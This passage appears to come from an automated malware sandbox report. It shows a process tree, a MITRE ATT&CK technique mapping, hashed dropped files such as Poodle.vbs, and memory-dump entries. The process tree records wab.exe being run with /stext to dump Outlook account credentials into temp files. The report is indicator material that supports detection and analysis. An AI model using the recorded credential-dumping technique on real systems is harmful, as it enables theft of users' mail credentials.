                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgmpiqsvxyqhphgdd"
                    5⤵
                      PID:3712
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgmpiqsvxyqhphgdd"
                      5⤵
                      • Accesses Microsoft Outlook accounts
                      PID:3584
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kizziidwlgimzvchmkjq"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:708
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1420,i,17949988676391029604,13756926835471203788,262144 --variations-seed-version --mojo-platform-channel-handle=4428 /prefetch:8
              1⤵
                PID:4508

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              2
              T1112

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Lateral Movement

              Collection

              Email Collection

              1
              T1114

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\09B406FB8A13DE24E07EA97DC21FE315
                Filesize

                504B

                MD5

                e9cffd0f467e92069c201181dbd90df8

                SHA1

                36fe1ce0027f8be2c3dcf36ab3ff1103632ca110

                SHA256

                e2c1597f5881a785e4010b1d4d2a6b84c57706c5593c232c679b6cfc87d1f01c

                SHA512

                fdd32d91347187dad26debf92975a716193e9d4e571b0fb1c52a92777b3bcc7fa2d234765e1e11108993f80cd0c07572e11d9cf21d8190936f21baa15417add9

                Download Submit
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                Filesize

                717B

                MD5

                822467b728b7a66b081c91795373789a

                SHA1

                d8f2f02e1eef62485a9feffd59ce837511749865

                SHA256

                af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

                SHA512

                bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

                Download Submit
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\09B406FB8A13DE24E07EA97DC21FE315
                Filesize

                546B

                MD5

                16d30eb8ced193fa58011de678128a48

                SHA1

                bd13be284801eec8027c9613a38563a770670fc7

                SHA256

                87953e9a4cad063808340e530e68d8d6475a9b67ffbf3d1f10f935caa0422687

                SHA512

                7f75fdf25b0ac33053c6fc6b8630c5b825dd8e620b37933673a4647e6f3467bb7679543de116a14e522856ad095d746ed9fb1fcf20838e23f0812a74ea964ab1

                Download Submit
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                Filesize

                192B

                MD5

                46cd1ac8f498725feb8b487e0141a811

                SHA1

                30b670def692d3af22d6fdf926c5870e76464dfc

                SHA256

                4a66555cedd4faa73f1a50411be5b0dcfb034c272c117e77dbad176bdd2c63c3

                SHA512

                e2abc93c713cfdb182464e47da5409a21f41d99571d8203b5bbcb6c7daa558b1ae16ba3f3f849c47e369a21b1fc91d3b63549c5c4340414a97cbd05c657de7ba

                Download Submit
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                Filesize

                53KB

                MD5

                d4d8cef58818612769a698c291ca3b37

                SHA1

                54e0a6e0c08723157829cea009ec4fe30bea5c50

                SHA256

                98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

                SHA512

                f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

                Download Submit
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                d4ff23c124ae23955d34ae2a7306099a

                SHA1

                b814e3331a09a27acfcd114d0c8fcb07957940a3

                SHA256

                1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

                SHA512

                f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\Poodle.vbs
                Filesize

                187KB

                MD5

                8cc6be5a2911ea3dc1a05c80e20ede55

                SHA1

                5a68267614fc4f21b949dc82def16adb1a2a7178

                SHA256

                7dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824

                SHA512

                cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdlr1rsl.mnd.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\xmhwhyibjqyuma
                Filesize

                4KB

                MD5

                1f438b4289b7bacbfd5f1c8e7fc2f75f

                SHA1

                dcda2f2c41416c5515889519b668feca49fd5c71

                SHA256

                dda03a1caa93b0ff4d9204642c71cb6de58ede08d1ebac4e7fd194c94ec06d7c

                SHA512

                c138ad05e8330a836b700d65beb2a9492b4d97e076c39aa4ed886653c00c45b650a812fe82ec620ad6e698f4f47362154d763ca0c68c256dfeb7c169d2e35515

                Download Submit
              • C:\Users\Admin\AppData\Roaming\Gleir.Und
                Filesize

                496KB

                MD5

                668f9a675a74efad8e03ec3f59d91054

                SHA1

                58714abce023cfce5831c0bd753dfed9a29efa8d

                SHA256

                469421725844762d51ecb023ad25bfe29319c77a1c1cdec4710d03a2da78ad59

                SHA512

                ef830da73695d3f3de4eed65ef3ebb7b40458ece4ca0a020c99970cacab8b3a5735696bfe13ba5b13efbfeb6b6082210abfbfcbd6b8dea716cd85ebe443313a4

                Download Submit
              • C:\Users\Admin\AppData\Roaming\belemnoidea.Fos
                Filesize

                519KB

                MD5

                9cc29e9c2f524984e4ea412888fad3ab

                SHA1

                a3d9571861e7f334d70d82eb0c46e10f5427358e

                SHA256

                6b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887

                SHA512

                d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396

                Download Submit
              • memory/708-68-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/708-69-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/708-73-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/1364-98-0x000000001F610000-0x000000001F629000-memory.dmp
                Filesize

                100KB

                Download
              • memory/1364-97-0x000000001F610000-0x000000001F629000-memory.dmp
                Filesize

                100KB

                Download
              • memory/1364-94-0x000000001F610000-0x000000001F629000-memory.dmp
                Filesize

                100KB

                Download
              • memory/1364-48-0x00000000024A0000-0x0000000003561000-memory.dmp
                Filesize

                16.8MB

                Download
              • memory/1660-51-0x00007FF9C5690000-0x00007FF9C6151000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1660-39-0x00007FF9C5693000-0x00007FF9C5695000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1660-41-0x00007FF9C5690000-0x00007FF9C6151000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1660-0-0x00007FF9C5693000-0x00007FF9C5695000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1660-3-0x0000018635840000-0x0000018635862000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1660-11-0x00007FF9C5690000-0x00007FF9C6151000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1660-12-0x00007FF9C5690000-0x00007FF9C6151000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/2612-131-0x0000000001050000-0x0000000006B95000-memory.dmp
                Filesize

                91.3MB

                Download
              • memory/2612-120-0x0000000001050000-0x0000000006B95000-memory.dmp
                Filesize

                91.3MB

                Download
              • memory/3584-66-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/3584-64-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/3584-67-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/3788-18-0x0000000005B30000-0x0000000005B96000-memory.dmp
                Filesize

                408KB

                Download
              • memory/3788-19-0x0000000005BA0000-0x0000000005C06000-memory.dmp
                Filesize

                408KB

                Download
              • memory/3788-36-0x0000000008690000-0x0000000008C34000-memory.dmp
                Filesize

                5.6MB

                Download
              • memory/3788-35-0x0000000007460000-0x0000000007482000-memory.dmp
                Filesize

                136KB

                Download
              • memory/3788-34-0x00000000074D0000-0x0000000007566000-memory.dmp
                Filesize

                600KB

                Download
              • memory/3788-31-0x0000000006240000-0x000000000628C000-memory.dmp
                Filesize

                304KB

                Download
              • memory/3788-33-0x0000000006790000-0x00000000067AA000-memory.dmp
                Filesize

                104KB

                Download
              • memory/3788-30-0x0000000006200000-0x000000000621E000-memory.dmp
                Filesize

                120KB

                Download
              • memory/3788-29-0x0000000005D10000-0x0000000006064000-memory.dmp
                Filesize

                3.3MB

                Download
              • memory/3788-32-0x0000000007A60000-0x00000000080DA000-memory.dmp
                Filesize

                6.5MB

                Download
              • memory/3788-38-0x0000000008C40000-0x0000000009D01000-memory.dmp
                Filesize

                16.8MB

                Download
              • memory/3788-17-0x0000000005360000-0x0000000005382000-memory.dmp
                Filesize

                136KB

                Download
              • memory/3788-16-0x0000000005410000-0x0000000005A38000-memory.dmp
                Filesize

                6.2MB

                Download
              • memory/3788-15-0x00000000028D0000-0x0000000002906000-memory.dmp
                Filesize

                216KB

                Download
              • memory/4240-85-0x0000000006450000-0x000000000649C000-memory.dmp
                Filesize

                304KB

                Download
              • memory/4240-83-0x0000000005DE0000-0x0000000006134000-memory.dmp
                Filesize

                3.3MB

                Download
              • memory/4504-65-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/4504-62-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/4504-63-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/5056-114-0x00000000086E0000-0x000000000E225000-memory.dmp
                Filesize

                91.3MB

                Download